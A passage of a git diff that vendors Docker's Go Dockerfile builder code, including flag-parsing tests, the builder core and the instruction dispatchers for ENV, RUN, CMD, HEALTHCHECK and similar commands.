"HI") + bf.Args = []string{"--str1="} + + if err = bf.Parse(); err != nil { + t.Fatalf("Test %q was supposed to work: %s", bf.Args, err) + } + + expected = "" + if flStr1.Value != expected { + t.Fatalf("Str1 (%q) should be: %q", flStr1.Value, expected) + } + + // --- + + bf = NewBFlags() + flStr1 = bf.AddString("str1", "HI") + bf.Args = []string{"--str1=BYE"} + + if err = bf.Parse(); err != nil { + t.Fatalf("Test %q was supposed to work: %s", bf.Args, err) + } + + expected = "BYE" + if flStr1.Value != expected { + t.Fatalf("Str1 (%q) should be: %q", flStr1.Value, expected) + } + + // --- + + bf = NewBFlags() + flBool1 = bf.AddBool("bool1", false) + bf.Args = []string{"--bool1"} + + if err = bf.Parse(); err != nil { + t.Fatalf("Test %q was supposed to work: %s", bf.Args, err) + } + + if !flBool1.IsTrue() { + t.Fatalf("Test-b1 Bool1 was supposed to be true") + } + + // --- + + bf = NewBFlags() + flBool1 = bf.AddBool("bool1", false) + bf.Args = []string{"--bool1=true"} + + if err = bf.Parse(); err != nil { + t.Fatalf("Test %q was supposed to work: %s", bf.Args, err) + } + + if !flBool1.IsTrue() { + t.Fatalf("Test-b2 Bool1 was supposed to be true") + } + + // --- + + bf = NewBFlags() + flBool1 = bf.AddBool("bool1", false) + bf.Args = []string{"--bool1=false"} + + if err = bf.Parse(); err != nil { + t.Fatalf("Test %q was supposed to work: %s", bf.Args, err) + } + + if flBool1.IsTrue() { + t.Fatalf("Test-b3 Bool1 was supposed to be false") + } + + // --- + + bf = NewBFlags() + flBool1 = bf.AddBool("bool1", false) + bf.Args = []string{"--bool1=false1"} + + if err = bf.Parse(); err == nil { + t.Fatalf("Test %q was supposed to fail", bf.Args) + } + + // --- + + bf = NewBFlags() + flBool1 = bf.AddBool("bool1", false) + bf.Args = []string{"--bool2"} + + if err = bf.Parse(); err == nil { + t.Fatalf("Test %q was supposed to fail", bf.Args) + } + + // --- + + bf = NewBFlags() + flStr1 = bf.AddString("str1", "HI") + flBool1 = bf.AddBool("bool1", false) + bf.Args = 
[]string{"--bool1", "--str1=BYE"} + + if err = bf.Parse(); err != nil { + t.Fatalf("Test %q was supposed to work: %s", bf.Args, err) + } + + if flStr1.Value != "BYE" { + t.Fatalf("Teset %s, str1 should be BYE", bf.Args) + } + if !flBool1.IsTrue() { + t.Fatalf("Teset %s, bool1 should be true", bf.Args) + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder.go b/vendor/github.com/docker/docker/builder/dockerfile/builder.go new file mode 100644 index 0000000000..da43513fff --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/builder.go @@ -0,0 +1,370 @@ +package dockerfile + +import ( + "bytes" + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "strings" + + "github.com/Sirupsen/logrus" + apierrors "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + "github.com/docker/docker/builder/dockerfile/parser" + "github.com/docker/docker/image" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" + perrors "github.com/pkg/errors" + "golang.org/x/net/context" +) + +var validCommitCommands = map[string]bool{ + "cmd": true, + "entrypoint": true, + "healthcheck": true, + "env": true, + "expose": true, + "label": true, + "onbuild": true, + "user": true, + "volume": true, + "workdir": true, +} + +// BuiltinAllowedBuildArgs is list of built-in allowed build args +var BuiltinAllowedBuildArgs = map[string]bool{ + "HTTP_PROXY": true, + "http_proxy": true, + "HTTPS_PROXY": true, + "https_proxy": true, + "FTP_PROXY": true, + "ftp_proxy": true, + "NO_PROXY": true, + "no_proxy": true, +} + +// Builder is a Dockerfile builder +// It implements the builder.Backend interface. 
+type Builder struct { + options *types.ImageBuildOptions + + Stdout io.Writer + Stderr io.Writer + Output io.Writer + + docker builder.Backend + context builder.Context + clientCtx context.Context + cancel context.CancelFunc + + dockerfile *parser.Node + runConfig *container.Config // runconfig for cmd, run, entrypoint etc. + flags *BFlags + tmpContainers map[string]struct{} + image string // imageID + noBaseImage bool + maintainer string + cmdSet bool + disableCommit bool + cacheBusted bool + allowedBuildArgs map[string]bool // list of build-time args that are allowed for expansion/substitution and passing to commands in 'run'. + directive parser.Directive + + // TODO: remove once docker.Commit can receive a tag + id string + + imageCache builder.ImageCache + from builder.Image +} + +// BuildManager implements builder.Backend and is shared across all Builder objects. +type BuildManager struct { + backend builder.Backend +} + +// NewBuildManager creates a BuildManager. +func NewBuildManager(b builder.Backend) (bm *BuildManager) { + return &BuildManager{backend: b} +} + +// BuildFromContext builds a new image from a given context. 
+func (bm *BuildManager) BuildFromContext(ctx context.Context, src io.ReadCloser, remote string, buildOptions *types.ImageBuildOptions, pg backend.ProgressWriter) (string, error) { + if buildOptions.Squash && !bm.backend.HasExperimental() { + return "", apierrors.NewBadRequestError(errors.New("squash is only supported with experimental mode")) + } + buildContext, dockerfileName, err := builder.DetectContextFromRemoteURL(src, remote, pg.ProgressReaderFunc) + if err != nil { + return "", err + } + defer func() { + if err := buildContext.Close(); err != nil { + logrus.Debugf("[BUILDER] failed to remove temporary context: %v", err) + } + }() + + if len(dockerfileName) > 0 { + buildOptions.Dockerfile = dockerfileName + } + b, err := NewBuilder(ctx, buildOptions, bm.backend, builder.DockerIgnoreContext{ModifiableContext: buildContext}, nil) + if err != nil { + return "", err + } + return b.build(pg.StdoutFormatter, pg.StderrFormatter, pg.Output) +} + +// NewBuilder creates a new Dockerfile builder from an optional dockerfile and a Config. +// If dockerfile is nil, the Dockerfile specified by Config.DockerfileName, +// will be read from the Context passed to Build(). 
+func NewBuilder(clientCtx context.Context, config *types.ImageBuildOptions, backend builder.Backend, buildContext builder.Context, dockerfile io.ReadCloser) (b *Builder, err error) { + if config == nil { + config = new(types.ImageBuildOptions) + } + if config.BuildArgs == nil { + config.BuildArgs = make(map[string]*string) + } + ctx, cancel := context.WithCancel(clientCtx) + b = &Builder{ + clientCtx: ctx, + cancel: cancel, + options: config, + Stdout: os.Stdout, + Stderr: os.Stderr, + docker: backend, + context: buildContext, + runConfig: new(container.Config), + tmpContainers: map[string]struct{}{}, + id: stringid.GenerateNonCryptoID(), + allowedBuildArgs: make(map[string]bool), + directive: parser.Directive{ + EscapeSeen: false, + LookingForDirectives: true, + }, + } + if icb, ok := backend.(builder.ImageCacheBuilder); ok { + b.imageCache = icb.MakeImageCache(config.CacheFrom) + } + + parser.SetEscapeToken(parser.DefaultEscapeToken, &b.directive) // Assume the default token for escape + + if dockerfile != nil { + b.dockerfile, err = parser.Parse(dockerfile, &b.directive) + if err != nil { + return nil, err + } + } + + return b, nil +} + +// sanitizeRepoAndTags parses the raw "t" parameter received from the client +// to a slice of repoAndTag. +// It also validates each repoName and tag. +func sanitizeRepoAndTags(names []string) ([]reference.Named, error) { + var ( + repoAndTags []reference.Named + // This map is used for deduplicating the "-t" parameter. 
+ uniqNames = make(map[string]struct{}) + ) + for _, repo := range names { + if repo == "" { + continue + } + + ref, err := reference.ParseNamed(repo) + if err != nil { + return nil, err + } + + ref = reference.WithDefaultTag(ref) + + if _, isCanonical := ref.(reference.Canonical); isCanonical { + return nil, errors.New("build tag cannot contain a digest") + } + + if _, isTagged := ref.(reference.NamedTagged); !isTagged { + ref, err = reference.WithTag(ref, reference.DefaultTag) + if err != nil { + return nil, err + } + } + + nameWithTag := ref.String() + + if _, exists := uniqNames[nameWithTag]; !exists { + uniqNames[nameWithTag] = struct{}{} + repoAndTags = append(repoAndTags, ref) + } + } + return repoAndTags, nil +} + +// build runs the Dockerfile builder from a context and a docker object that allows to make calls +// to Docker. +// +// This will (barring errors): +// +// * read the dockerfile from context +// * parse the dockerfile if not already parsed +// * walk the AST and execute it by dispatching to handlers. If Remove +// or ForceRemove is set, additional cleanup around containers happens after +// processing. +// * Tag image, if applicable. +// * Print a happy message and return the image ID. 
+// +func (b *Builder) build(stdout io.Writer, stderr io.Writer, out io.Writer) (string, error) { + b.Stdout = stdout + b.Stderr = stderr + b.Output = out + + // If Dockerfile was not parsed yet, extract it from the Context + if b.dockerfile == nil { + if err := b.readDockerfile(); err != nil { + return "", err + } + } + + repoAndTags, err := sanitizeRepoAndTags(b.options.Tags) + if err != nil { + return "", err + } + + if len(b.options.Labels) > 0 { + line := "LABEL " + for k, v := range b.options.Labels { + line += fmt.Sprintf("%q='%s' ", k, v) + } + _, node, err := parser.ParseLine(line, &b.directive, false) + if err != nil { + return "", err + } + b.dockerfile.Children = append(b.dockerfile.Children, node) + } + + var shortImgID string + total := len(b.dockerfile.Children) + for _, n := range b.dockerfile.Children { + if err := b.checkDispatch(n, false); err != nil { + return "", err + } + } + + for i, n := range b.dockerfile.Children { + select { + case <-b.clientCtx.Done(): + logrus.Debug("Builder: build cancelled!") + fmt.Fprintf(b.Stdout, "Build cancelled") + return "", fmt.Errorf("Build cancelled") + default: + // Not cancelled yet, keep going... + } + + if err := b.dispatch(i, total, n); err != nil { + if b.options.ForceRemove { + b.clearTmp() + } + return "", err + } + + shortImgID = stringid.TruncateID(b.image) + fmt.Fprintf(b.Stdout, " ---> %s\n", shortImgID) + if b.options.Remove { + b.clearTmp() + } + } + + // check if there are any leftover build-args that were passed but not + // consumed during build. Return a warning, if there are any. + leftoverArgs := []string{} + for arg := range b.options.BuildArgs { + if !b.isBuildArgAllowed(arg) { + leftoverArgs = append(leftoverArgs, arg) + } + } + + if len(leftoverArgs) > 0 { + fmt.Fprintf(b.Stderr, "[Warning] One or more build-args %v were not consumed\n", leftoverArgs) + } + + if b.image == "" { + return "", fmt.Errorf("No image was generated. 
Is your Dockerfile empty?") + } + + if b.options.Squash { + var fromID string + if b.from != nil { + fromID = b.from.ImageID() + } + b.image, err = b.docker.SquashImage(b.image, fromID) + if err != nil { + return "", perrors.Wrap(err, "error squashing image") + } + } + + imageID := image.ID(b.image) + for _, rt := range repoAndTags { + if err := b.docker.TagImageWithReference(imageID, rt); err != nil { + return "", err + } + } + + fmt.Fprintf(b.Stdout, "Successfully built %s\n", shortImgID) + return b.image, nil +} + +// Cancel cancels an ongoing Dockerfile build. +func (b *Builder) Cancel() { + b.cancel() +} + +// BuildFromConfig builds directly from `changes`, treating it as if it were the contents of a Dockerfile +// It will: +// - Call parse.Parse() to get an AST root for the concatenated Dockerfile entries. +// - Do build by calling builder.dispatch() to call all entries' handling routines +// +// BuildFromConfig is used by the /commit endpoint, with the changes +// coming from the query parameter of the same name. +// +// TODO: Remove? 
+func BuildFromConfig(config *container.Config, changes []string) (*container.Config, error) { + b, err := NewBuilder(context.Background(), nil, nil, nil, nil) + if err != nil { + return nil, err + } + + ast, err := parser.Parse(bytes.NewBufferString(strings.Join(changes, "\n")), &b.directive) + if err != nil { + return nil, err + } + + // ensure that the commands are valid + for _, n := range ast.Children { + if !validCommitCommands[n.Value] { + return nil, fmt.Errorf("%s is not a valid change command", n.Value) + } + } + + b.runConfig = config + b.Stdout = ioutil.Discard + b.Stderr = ioutil.Discard + b.disableCommit = true + + total := len(ast.Children) + for _, n := range ast.Children { + if err := b.checkDispatch(n, false); err != nil { + return nil, err + } + } + + for i, n := range ast.Children { + if err := b.dispatch(i, total, n); err != nil { + return nil, err + } + } + + return b.runConfig, nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go new file mode 100644 index 0000000000..76a7ce74f9 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/builder_unix.go @@ -0,0 +1,5 @@ +// +build !windows + +package dockerfile + +var defaultShell = []string{"/bin/sh", "-c"} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go new file mode 100644 index 0000000000..37e9fbcf4b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/builder_windows.go @@ -0,0 +1,3 @@ +package dockerfile + +var defaultShell = []string{"cmd", "/S", "/C"} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/command/command.go b/vendor/github.com/docker/docker/builder/dockerfile/command/command.go new file mode 100644 index 0000000000..f23c6874b5 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/command/command.go @@ -0,0 
+1,46 @@ +// Package command contains the set of Dockerfile commands. +package command + +// Define constants for the command strings +const ( + Add = "add" + Arg = "arg" + Cmd = "cmd" + Copy = "copy" + Entrypoint = "entrypoint" + Env = "env" + Expose = "expose" + From = "from" + Healthcheck = "healthcheck" + Label = "label" + Maintainer = "maintainer" + Onbuild = "onbuild" + Run = "run" + Shell = "shell" + StopSignal = "stopsignal" + User = "user" + Volume = "volume" + Workdir = "workdir" +) + +// Commands is list of all Dockerfile commands +var Commands = map[string]struct{}{ + Add: {}, + Arg: {}, + Cmd: {}, + Copy: {}, + Entrypoint: {}, + Env: {}, + Expose: {}, + From: {}, + Healthcheck: {}, + Label: {}, + Maintainer: {}, + Onbuild: {}, + Run: {}, + Shell: {}, + StopSignal: {}, + User: {}, + Volume: {}, + Workdir: {}, +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go new file mode 100644 index 0000000000..3e78abdd68 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers.go @@ -0,0 +1,821 @@ +package dockerfile + +// This file contains the dispatchers for each command. Note that +// `nullDispatch` is not actually a command, but support for commands we parse +// but do nothing with. +// +// See evaluator.go for a higher level discussion of the whole evaluator +// package. 
+ +import ( + "fmt" + "regexp" + "runtime" + "sort" + "strconv" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/builder" + "github.com/docker/docker/pkg/signal" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-connections/nat" +) + +// ENV foo bar +// +// Sets the environment variable foo to bar, also makes interpolation +// in the dockerfile available from the next statement on via ${foo}. +// +func env(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) == 0 { + return errAtLeastOneArgument("ENV") + } + + if len(args)%2 != 0 { + // should never get here, but just in case + return errTooManyArguments("ENV") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + // TODO/FIXME/NOT USED + // Just here to show how to use the builder flags stuff within the + // context of a builder command. Will remove once we actually add + // a builder command to something! 
+ /* + flBool1 := b.flags.AddBool("bool1", false) + flStr1 := b.flags.AddString("str1", "HI") + + if err := b.flags.Parse(); err != nil { + return err + } + + fmt.Printf("Bool1:%v\n", flBool1) + fmt.Printf("Str1:%v\n", flStr1) + */ + + commitStr := "ENV" + + for j := 0; j < len(args); j++ { + // name ==> args[j] + // value ==> args[j+1] + + if len(args[j]) == 0 { + return errBlankCommandNames("ENV") + } + newVar := args[j] + "=" + args[j+1] + "" + commitStr += " " + newVar + + gotOne := false + for i, envVar := range b.runConfig.Env { + envParts := strings.SplitN(envVar, "=", 2) + compareFrom := envParts[0] + compareTo := args[j] + if runtime.GOOS == "windows" { + // Case insensitive environment variables on Windows + compareFrom = strings.ToUpper(compareFrom) + compareTo = strings.ToUpper(compareTo) + } + if compareFrom == compareTo { + b.runConfig.Env[i] = newVar + gotOne = true + break + } + } + if !gotOne { + b.runConfig.Env = append(b.runConfig.Env, newVar) + } + j++ + } + + return b.commit("", b.runConfig.Cmd, commitStr) +} + +// MAINTAINER some text +// +// Sets the maintainer metadata. 
+func maintainer(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) != 1 { + return errExactlyOneArgument("MAINTAINER") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + b.maintainer = args[0] + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("MAINTAINER %s", b.maintainer)) +} + +// LABEL some json data describing the image +// +// Sets the Label variable foo to bar, +// +func label(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) == 0 { + return errAtLeastOneArgument("LABEL") + } + if len(args)%2 != 0 { + // should never get here, but just in case + return errTooManyArguments("LABEL") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + commitStr := "LABEL" + + if b.runConfig.Labels == nil { + b.runConfig.Labels = map[string]string{} + } + + for j := 0; j < len(args); j++ { + // name ==> args[j] + // value ==> args[j+1] + + if len(args[j]) == 0 { + return errBlankCommandNames("LABEL") + } + + newVar := args[j] + "=" + args[j+1] + "" + commitStr += " " + newVar + + b.runConfig.Labels[args[j]] = args[j+1] + j++ + } + return b.commit("", b.runConfig.Cmd, commitStr) +} + +// ADD foo /path +// +// Add the file 'foo' to '/path'. Tarball and Remote URL (git, http) handling +// exist here. If you do not wish to have this automatic handling, use COPY. +// +func add(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) < 2 { + return errAtLeastTwoArguments("ADD") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + return b.runContextCommand(args, true, true, "ADD") +} + +// COPY foo /path +// +// Same as 'ADD' but without the tar and remote url handling. 
+// +func dispatchCopy(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) < 2 { + return errAtLeastTwoArguments("COPY") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + return b.runContextCommand(args, false, false, "COPY") +} + +// FROM imagename +// +// This sets the image the dockerfile will build on top of. +// +func from(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) != 1 { + return errExactlyOneArgument("FROM") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + name := args[0] + + var ( + image builder.Image + err error + ) + + // Windows cannot support a container with no base image. + if name == api.NoBaseImageSpecifier { + if runtime.GOOS == "windows" { + return fmt.Errorf("Windows does not support FROM scratch") + } + b.image = "" + b.noBaseImage = true + } else { + // TODO: don't use `name`, instead resolve it to a digest + if !b.options.PullParent { + image, err = b.docker.GetImageOnBuild(name) + // TODO: shouldn't we error out if error is different from "not found" ? + } + if image == nil { + image, err = b.docker.PullOnBuild(b.clientCtx, name, b.options.AuthConfigs, b.Output) + if err != nil { + return err + } + } + } + b.from = image + + return b.processImageFrom(image) +} + +// ONBUILD RUN echo yo +// +// ONBUILD triggers run when the image is used in a FROM statement. +// +// ONBUILD handling has a lot of special-case functionality, the heading in +// evaluator.go and comments around dispatch() in the same file explain the +// special cases. search for 'OnBuild' in internals.go for additional special +// cases. 
+// +func onbuild(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) == 0 { + return errAtLeastOneArgument("ONBUILD") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + triggerInstruction := strings.ToUpper(strings.TrimSpace(args[0])) + switch triggerInstruction { + case "ONBUILD": + return fmt.Errorf("Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed") + case "MAINTAINER", "FROM": + return fmt.Errorf("%s isn't allowed as an ONBUILD trigger", triggerInstruction) + } + + original = regexp.MustCompile(`(?i)^\s*ONBUILD\s*`).ReplaceAllString(original, "") + + b.runConfig.OnBuild = append(b.runConfig.OnBuild, original) + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("ONBUILD %s", original)) +} + +// WORKDIR /tmp +// +// Set the working directory for future RUN/CMD/etc statements. +// +func workdir(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) != 1 { + return errExactlyOneArgument("WORKDIR") + } + + err := b.flags.Parse() + if err != nil { + return err + } + + // This is from the Dockerfile and will not necessarily be in platform + // specific semantics, hence ensure it is converted. + b.runConfig.WorkingDir, err = normaliseWorkdir(b.runConfig.WorkingDir, args[0]) + if err != nil { + return err + } + + // For performance reasons, we explicitly do a create/mkdir now + // This avoids having an unnecessary expensive mount/unmount calls + // (on Windows in particular) during each container create. + // Prior to 1.13, the mkdir was deferred and not executed at this step. + if b.disableCommit { + // Don't call back into the daemon if we're going through docker commit --change "WORKDIR /foo". + // We've already updated the runConfig and that's enough. 
+ return nil + } + b.runConfig.Image = b.image + + cmd := b.runConfig.Cmd + comment := "WORKDIR " + b.runConfig.WorkingDir + // reset the command for cache detection + b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), "#(nop) "+comment)) + defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) + + if hit, err := b.probeCache(); err != nil { + return err + } else if hit { + return nil + } + + container, err := b.docker.ContainerCreate(types.ContainerCreateConfig{Config: b.runConfig}) + if err != nil { + return err + } + b.tmpContainers[container.ID] = struct{}{} + if err := b.docker.ContainerCreateWorkdir(container.ID); err != nil { + return err + } + + return b.commit(container.ID, cmd, comment) +} + +// RUN some command yo +// +// run a command and commit the image. Args are automatically prepended with +// the current SHELL which defaults to 'sh -c' under linux or 'cmd /S /C' under +// Windows, in the event there is only one argument The difference in processing: +// +// RUN echo hi # sh -c echo hi (Linux) +// RUN echo hi # cmd /S /C echo hi (Windows) +// RUN [ "echo", "hi" ] # echo hi +// +func run(b *Builder, args []string, attributes map[string]bool, original string) error { + if b.image == "" && !b.noBaseImage { + return fmt.Errorf("Please provide a source image with `from` prior to run") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + args = handleJSONArgs(args, attributes) + + if !attributes["json"] { + args = append(getShell(b.runConfig), args...) 
+ } + config := &container.Config{ + Cmd: strslice.StrSlice(args), + Image: b.image, + } + + // stash the cmd + cmd := b.runConfig.Cmd + if len(b.runConfig.Entrypoint) == 0 && len(b.runConfig.Cmd) == 0 { + b.runConfig.Cmd = config.Cmd + } + + // stash the config environment + env := b.runConfig.Env + + defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) + defer func(env []string) { b.runConfig.Env = env }(env) + + // derive the net build-time environment for this run. We let config + // environment override the build time environment. + // This means that we take the b.buildArgs list of env vars and remove + // any of those variables that are defined as part of the container. In other + // words, anything in b.Config.Env. What's left is the list of build-time env + // vars that we need to add to each RUN command - note the list could be empty. + // + // We don't persist the build time environment with container's config + // environment, but just sort and prepend it to the command string at time + // of commit. + // This helps with tracing back the image's actual environment at the time + // of RUN, without leaking it to the final image. It also aids cache + // lookup for same image built with same build time environment. + cmdBuildEnv := []string{} + configEnv := runconfigopts.ConvertKVStringsToMap(b.runConfig.Env) + for key, val := range b.options.BuildArgs { + if !b.isBuildArgAllowed(key) { + // skip build-args that are not in allowed list, meaning they have + // not been defined by an "ARG" Dockerfile command yet. + // This is an error condition but only if there is no "ARG" in the entire + // Dockerfile, so we'll generate any necessary errors after we parsed + // the entire file (see 'leftoverArgs' processing in evaluator.go ) + continue + } + if _, ok := configEnv[key]; !ok && val != nil { + cmdBuildEnv = append(cmdBuildEnv, fmt.Sprintf("%s=%s", key, *val)) + } + } + + // derive the command to use for probeCache() and to commit in this container. 
+ // Note that we only do this if there are any build-time env vars. Also, we + // use the special argument "|#" at the start of the args array. This will + // avoid conflicts with any RUN command since commands can not + // start with | (vertical bar). The "#" (number of build envs) is there to + // help ensure proper cache matches. We don't want a RUN command + // that starts with "foo=abc" to be considered part of a build-time env var. + saveCmd := config.Cmd + if len(cmdBuildEnv) > 0 { + sort.Strings(cmdBuildEnv) + tmpEnv := append([]string{fmt.Sprintf("|%d", len(cmdBuildEnv))}, cmdBuildEnv...) + saveCmd = strslice.StrSlice(append(tmpEnv, saveCmd...)) + } + + b.runConfig.Cmd = saveCmd + hit, err := b.probeCache() + if err != nil { + return err + } + if hit { + return nil + } + + // set Cmd manually, this is special case only for Dockerfiles + b.runConfig.Cmd = config.Cmd + // set build-time environment for 'run'. + b.runConfig.Env = append(b.runConfig.Env, cmdBuildEnv...) + // set config as already being escaped, this prevents double escaping on windows + b.runConfig.ArgsEscaped = true + + logrus.Debugf("[BUILDER] Command to be executed: %v", b.runConfig.Cmd) + + cID, err := b.create() + if err != nil { + return err + } + + if err := b.run(cID); err != nil { + return err + } + + // revert to original config environment and set the command string to + // have the build-time env vars in it (if any) so that future cache look-ups + // properly match it. + b.runConfig.Env = env + b.runConfig.Cmd = saveCmd + return b.commit(cID, cmd, "run") +} + +// CMD foo +// +// Set the default command to run in the container (which may be empty). +// Argument handling is the same as RUN. +// +func cmd(b *Builder, args []string, attributes map[string]bool, original string) error { + if err := b.flags.Parse(); err != nil { + return err + } + + cmdSlice := handleJSONArgs(args, attributes) + + if !attributes["json"] { + cmdSlice = append(getShell(b.runConfig), cmdSlice...) 
+ } + + b.runConfig.Cmd = strslice.StrSlice(cmdSlice) + // set config as already being escaped, this prevents double escaping on windows + b.runConfig.ArgsEscaped = true + + if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("CMD %q", cmdSlice)); err != nil { + return err + } + + if len(args) != 0 { + b.cmdSet = true + } + + return nil +} + +// parseOptInterval(flag) is the duration of flag.Value, or 0 if +// empty. An error is reported if the value is given and is not positive. +func parseOptInterval(f *Flag) (time.Duration, error) { + s := f.Value + if s == "" { + return 0, nil + } + d, err := time.ParseDuration(s) + if err != nil { + return 0, err + } + if d <= 0 { + return 0, fmt.Errorf("Interval %#v must be positive", f.name) + } + return d, nil +} + +// HEALTHCHECK foo +// +// Set the default healthcheck command to run in the container (which may be empty). +// Argument handling is the same as RUN. +// +func healthcheck(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) == 0 { + return errAtLeastOneArgument("HEALTHCHECK") + } + typ := strings.ToUpper(args[0]) + args = args[1:] + if typ == "NONE" { + if len(args) != 0 { + return fmt.Errorf("HEALTHCHECK NONE takes no arguments") + } + test := strslice.StrSlice{typ} + b.runConfig.Healthcheck = &container.HealthConfig{ + Test: test, + } + } else { + if b.runConfig.Healthcheck != nil { + oldCmd := b.runConfig.Healthcheck.Test + if len(oldCmd) > 0 && oldCmd[0] != "NONE" { + fmt.Fprintf(b.Stdout, "Note: overriding previous HEALTHCHECK: %v\n", oldCmd) + } + } + + healthcheck := container.HealthConfig{} + + flInterval := b.flags.AddString("interval", "") + flTimeout := b.flags.AddString("timeout", "") + flRetries := b.flags.AddString("retries", "") + + if err := b.flags.Parse(); err != nil { + return err + } + + switch typ { + case "CMD": + cmdSlice := handleJSONArgs(args, attributes) + if len(cmdSlice) == 0 { + return fmt.Errorf("Missing command after HEALTHCHECK CMD") + } 
+ + if !attributes["json"] { + typ = "CMD-SHELL" + } + + healthcheck.Test = strslice.StrSlice(append([]string{typ}, cmdSlice...)) + default: + return fmt.Errorf("Unknown type %#v in HEALTHCHECK (try CMD)", typ) + } + + interval, err := parseOptInterval(flInterval) + if err != nil { + return err + } + healthcheck.Interval = interval + + timeout, err := parseOptInterval(flTimeout) + if err != nil { + return err + } + healthcheck.Timeout = timeout + + if flRetries.Value != "" { + retries, err := strconv.ParseInt(flRetries.Value, 10, 32) + if err != nil { + return err + } + if retries < 1 { + return fmt.Errorf("--retries must be at least 1 (not %d)", retries) + } + healthcheck.Retries = int(retries) + } else { + healthcheck.Retries = 0 + } + + b.runConfig.Healthcheck = &healthcheck + } + + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("HEALTHCHECK %q", b.runConfig.Healthcheck)) +} + +// ENTRYPOINT /usr/sbin/nginx +// +// Set the entrypoint to /usr/sbin/nginx. Will accept the CMD as the arguments +// to /usr/sbin/nginx. Uses the default shell if not in JSON format. +// +// Handles command processing similar to CMD and RUN, only b.runConfig.Entrypoint +// is initialized at NewBuilder time instead of through argument parsing. 
+// +func entrypoint(b *Builder, args []string, attributes map[string]bool, original string) error { + if err := b.flags.Parse(); err != nil { + return err + } + + parsed := handleJSONArgs(args, attributes) + + switch { + case attributes["json"]: + // ENTRYPOINT ["echo", "hi"] + b.runConfig.Entrypoint = strslice.StrSlice(parsed) + case len(parsed) == 0: + // ENTRYPOINT [] + b.runConfig.Entrypoint = nil + default: + // ENTRYPOINT echo hi + b.runConfig.Entrypoint = strslice.StrSlice(append(getShell(b.runConfig), parsed[0])) + } + + // when setting the entrypoint if a CMD was not explicitly set then + // set the command to nil + if !b.cmdSet { + b.runConfig.Cmd = nil + } + + if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("ENTRYPOINT %q", b.runConfig.Entrypoint)); err != nil { + return err + } + + return nil +} + +// EXPOSE 6667/tcp 7000/tcp +// +// Expose ports for links and port mappings. This all ends up in +// b.runConfig.ExposedPorts for runconfig. +// +func expose(b *Builder, args []string, attributes map[string]bool, original string) error { + portsTab := args + + if len(args) == 0 { + return errAtLeastOneArgument("EXPOSE") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + if b.runConfig.ExposedPorts == nil { + b.runConfig.ExposedPorts = make(nat.PortSet) + } + + ports, _, err := nat.ParsePortSpecs(portsTab) + if err != nil { + return err + } + + // instead of using ports directly, we build a list of ports and sort it so + // the order is consistent. 
This prevents cache burst where map ordering + // changes between builds + portList := make([]string, len(ports)) + var i int + for port := range ports { + if _, exists := b.runConfig.ExposedPorts[port]; !exists { + b.runConfig.ExposedPorts[port] = struct{}{} + } + portList[i] = string(port) + i++ + } + sort.Strings(portList) + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("EXPOSE %s", strings.Join(portList, " "))) +} + +// USER foo +// +// Set the user to 'foo' for future commands and when running the +// ENTRYPOINT/CMD at container run time. +// +func user(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) != 1 { + return errExactlyOneArgument("USER") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + b.runConfig.User = args[0] + return b.commit("", b.runConfig.Cmd, fmt.Sprintf("USER %v", args)) +} + +// VOLUME /foo +// +// Expose the volume /foo for use. Will also accept the JSON array form. +// +func volume(b *Builder, args []string, attributes map[string]bool, original string) error { + if len(args) == 0 { + return errAtLeastOneArgument("VOLUME") + } + + if err := b.flags.Parse(); err != nil { + return err + } + + if b.runConfig.Volumes == nil { + b.runConfig.Volumes = map[string]struct{}{} + } + for _, v := range args { + v = strings.TrimSpace(v) + if v == "" { + return fmt.Errorf("VOLUME specified can not be an empty string") + } + 